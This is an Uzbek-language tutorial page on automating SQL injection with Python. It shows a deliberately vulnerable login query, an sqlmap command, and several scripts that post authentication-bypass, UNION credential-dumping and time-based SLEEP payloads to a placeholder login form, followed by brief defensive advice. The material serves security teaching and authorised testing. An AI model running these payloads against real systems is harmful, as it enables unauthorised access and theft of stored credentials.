SQL Injection hujumlarini Python yordamida avtomatlashtirish

Ushbu bulimda SQL Injection hujumlarini avtomatlashtirish uchun Python-dan qanday foydalanishni tushuntiradi. Biz misollar yordamida xavfsiz dasturlarni qanday sinash va SQL Injection hujumlarini qanday amalga oshirishni o‘rganamiz.

Kirish

SQL Injection — bu veb-ilovalar uchun keng tarqalgan xavfsizlik zaifligi bo‘lib, foydalanuvchi kiritmalari orqali ma’lumotlar bazasiga zarar yetkazish yoki ma'lumotlarni o‘g‘irlash imkonini beradi. Bu qo‘llanma SQL Injection hujumlarini avtomatlashtirish, xususan, Python yordamida qanday amalga oshirishni ko‘rsatadi. Biroq, eslatib o‘tamiz, bunday hujumlarni faqat ruxsat etilgan tizimlarda, xavfsizlikni tekshirish maqsadida amalga oshirish kerak.

1. SQL Injectionning Asosiy Tushunchalari

SQL Injectionni amalga oshirish uchun avval ma’lumotlar bazasi bilan ishlashni va foydalanuvchi kiritmalarini manipulyatsiya qilishni tushunish zarur.

Misol (Xavfli kod):

import sqlite3

# Ma'lumotlar bazasiga ulanish
connection = sqlite3.connect('example.db')
cursor = connection.cursor()

# Foydalanuvchi kiritmasi
username = input('Foydalanuvchi nomi: ')
password = input('Parol: ')

# Xavfli SQL so‘rovi
query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
cursor.execute(query)
result = cursor.fetchall()

if result:
    print('Kirish muvaffaqiyatli!')
else:
    print('Xato foydalanuvchi yoki parol!')

Agar foydalanuvchi username o‘rniga ' OR '1'='1 kiritsa, quyidagi so‘rov yaratiladi:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';

Bu so‘rov barcha foydalanuvchilarning ma’lumotlarini qaytaradi, chunki OR '1'='1' har doim to‘g‘ri bo‘ladi.

2. SQL Injectionni Avtomatlashtirish

SQL Injection hujumlarini avtomatlashtirish uchun biz Python-da ba'zi kutubxonalar va metodlardan foydalanamiz.

2.1. SQLMap Kutubxonasi

SQLMap — bu SQL Injectionni aniqlash va ekspluatatsiya qilish uchun ishlab chiqilgan avtomatik vosita. Ammo, biz Python yordamida SQL Injectionni o‘z qo‘limiz bilan amalga oshirishni ko‘rib chiqamiz.

SQLMap bilan ishlash:

sqlmap -u "http://target-site.com/login?username=admin&password=admin" --risk=3 --level=5

2.2. Python-da SQL Injection Hujumlarini Avtomatlashtirish

Python yordamida SQL Injection hujumlarini amalga oshirish uchun biz HTTP so‘rovlarini yuborish, foydalanuvchi kiritmalarini manipulyatsiya qilish va natijalarni tahlil qilish uchun requests va BeautifulSoup kabi kutubxonalardan foydalanamiz.

Misol:

Biz veb-application login formasiga SQL Injection hujumini avtomatlashtirmoqchimiz.

import requests

# Target URL
url = "http://target-site.com/login"

# Test URL-lar
payloads = [
    "' OR '1'='1",
    "' OR 'a'='a",
    "' UNION SELECT null, username, password FROM users--"
]

# Foydalanuvchi ma'lumotlari (parol o‘rniga payload qo‘shamiz)
username = "admin"

for payload in payloads:
    data = {
        'username': username,
        'password': payload
    }
    
    response = requests.post(url, data=data)
    
    # Javobni tahlil qilish (login bo‘lsa, muvaffaqiyatli bo‘ladi)
    if "Welcome" in response.text:  # Agar "Welcome" matni bo'lsa, login muvaffaqiyatli
        print(f"SQL Injection muvaffaqiyatli bo'ldi: {payload}")
    else:
        print(f"SQL Injection muvaffaqiyatsiz: {payload}")

Tahlil:

Bu skript username va password parametrlarining turli SQL Injection payloadlarini sinab ko‘radi.
Agar veb-ilova "Welcome" matnini qaytarsa, demak hujum muvaffaqiyatli bo‘lgan va foydalanuvchi tizimga kirgan bo‘ladi.

3. Blind SQL Injection

Blind SQL Injection — bu tizimdan to‘g‘ridan-to‘g‘ri xatoliklarni olish mumkin bo‘lmagan holatlarda ishlatiladi. Bunday hujumda, tizimga faqat TRUE/FALSE javoblarini qaytarish mumkin.

3.1. Time-based Blind SQL Injection

Bu usulda tizim javob berish vaqtiga qarab ma’lumot olinadi.

Misol:

import requests
import time

# Target URL
url = "http://target-site.com/login"

# SQL payload (time delay)
payloads = [
    "' OR IF(1=1, SLEEP(5), 0)--",  # 1=1 bo'lsa, 5 soniya kutadi
    "' OR IF(1=2, SLEEP(5), 0)--"   # 1=2 bo'lsa, hech narsa bo'lmaydi
]

for payload in payloads:
    data = {
        'username': 'admin',
        'password': payload
    }
    
    start_time = time.time()
    response = requests.post(url, data=data)
    end_time = time.time()
    
    # Agar kutish vaqti 5 soniya bo'lsa, demak hujum muvaffaqiyatli
    if end_time - start_time > 5:
        print(f"Time-based SQL Injection muvaffaqiyatli bo'ldi: {payload}")
    else:
        print(f"Time-based SQL Injection muvaffaqiyatsiz: {payload}")

Tahlil:

Agar tizim 5 soniya kutib, javob qaytaradigan bo‘lsa, demak SQL Injection muvaffaqiyatli o‘tkazilgan va tizimda vaqtni kechiktiruvchi operatsiya amalga oshgan.

4. SQL Injectionning Hamma Yuzalarini Avtomatlashtirish

SQL Injectionning bir nechta turlarini avtomatlashtirish uchun quyidagi kodni yaratish mumkin. Bu skript barcha turdagi payloadlarni sinab ko‘radi va natijalarni tekshiradi.

import requests

# Target URL
url = "http://target-site.com/login"

# Foydalanuvchi ma'lumotlari
username = "admin"
passwords = [
    "' OR '1'='1",
    "' OR 'a'='a",
    "' UNION SELECT null, username, password FROM users--",
    "' OR IF(1=1, SLEEP(5), 0)--"
]

# Har bir payloadni sinab ko‘rish
for password in passwords:
    data = {
        'username': username,
        'password': password
    }
    
    response = requests.post(url, data=data)
    
    # Javobni tahlil qilish
    if "Welcome" in response.text:  # Agar "Welcome" matni bo'lsa, login muvaffaqiyatli
        print(f"SQL Injection muvaffaqiyatli bo'ldi: {password}")
    else:
        print(f"SQL Injection muvaffaqiyatsiz: {password}")

5. Xavfsizlikni Ta'minlash va SQL Injectiondan Himoyalanish

SQL Injection hujumlarini avtomatlashtirishga qarshi himoya choralarini ko‘rish zarur. Dasturda xavfsizlikni ta'minlash uchun quyidagi usullarni qo‘llang:

Tayyorlangan so‘rovlar (Parameterized Queries) — Foydalanuvchi kiritmalarini to‘g‘ridan-to‘g‘ri SQL so‘rovlariga qo‘shishdan saqlaning.
ORM (Object-Relational Mapping) — Django yoki SQLAlchemy kabi ORM kutubxonalaridan foydalaning.
Sanitizatsiya qilish — Kiruvchi foydalanuvchi ma’lumotlarini sanitizatsiya qilish.

6. Xulosa

SQL Injection hujumlarini avtomatlashtirish va ularni aniqlash uchun Python kuchli vositadir. Biroq, bunday hujumlarni faqat ruxsat etilgan tizimlarda, xavfsizlikni tekshirish uchun amalga oshiring. Hujumlarning oldini olish uchun xavfsizlik choralarini ko‘rish zarur, jumladan tayyorlangan so‘rovlar, ORM va kiruvchi ma’lumotlarni tekshirish.

PreviousSQL Injection va Python NextPython bilan SQL Injection zaifliklarini aniqlash

Last updated 1 day ago

import sqlite3 # Ma'lumotlar bazasiga ulanish connection = sqlite3.connect('example.db') cursor = connection.cursor() # Foydalanuvchi kiritmasi username = input('Foydalanuvchi nomi: ') password = input('Parol: ') # Xavfli SQL so‘rovi query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'" cursor.execute(query) result = cursor.fetchall() if result: print('Kirish muvaffaqiyatli!') else: print('Xato foydalanuvchi yoki parol!')

import requests # Target URL url = "http://target-site.com/login" # Test URL-lar payloads = [ "' OR '1'='1", "' OR 'a'='a", "' UNION SELECT null, username, password FROM users--" ] # Foydalanuvchi ma'lumotlari (parol o‘rniga payload qo‘shamiz) username = "admin" for payload in payloads: data = { 'username': username, 'password': payload } response = requests.post(url, data=data) # Javobni tahlil qilish (login bo‘lsa, muvaffaqiyatli bo‘ladi) if "Welcome" in response.text: # Agar "Welcome" matni bo'lsa, login muvaffaqiyatli print(f"SQL Injection muvaffaqiyatli bo'ldi: {payload}") else: print(f"SQL Injection muvaffaqiyatsiz: {payload}")

import requests import time # Target URL url = "http://target-site.com/login" # SQL payload (time delay) payloads = [ "' OR IF(1=1, SLEEP(5), 0)--", # 1=1 bo'lsa, 5 soniya kutadi "' OR IF(1=2, SLEEP(5), 0)--" # 1=2 bo'lsa, hech narsa bo'lmaydi ] for payload in payloads: data = { 'username': 'admin', 'password': payload } start_time = time.time() response = requests.post(url, data=data) end_time = time.time() # Agar kutish vaqti 5 soniya bo'lsa, demak hujum muvaffaqiyatli if end_time - start_time > 5: print(f"Time-based SQL Injection muvaffaqiyatli bo'ldi: {payload}") else: print(f"Time-based SQL Injection muvaffaqiyatsiz: {payload}")

import requests # Target URL url = "http://target-site.com/login" # Foydalanuvchi ma'lumotlari username = "admin" passwords = [ "' OR '1'='1", "' OR 'a'='a", "' UNION SELECT null, username, password FROM users--", "' OR IF(1=1, SLEEP(5), 0)--" ] # Har bir payloadni sinab ko‘rish for password in passwords: data = { 'username': username, 'password': password } response = requests.post(url, data=data) # Javobni tahlil qilish if "Welcome" in response.text: # Agar "Welcome" matni bo'lsa, login muvaffaqiyatli print(f"SQL Injection muvaffaqiyatli bo'ldi: {password}") else: print(f"SQL Injection muvaffaqiyatsiz: {password}")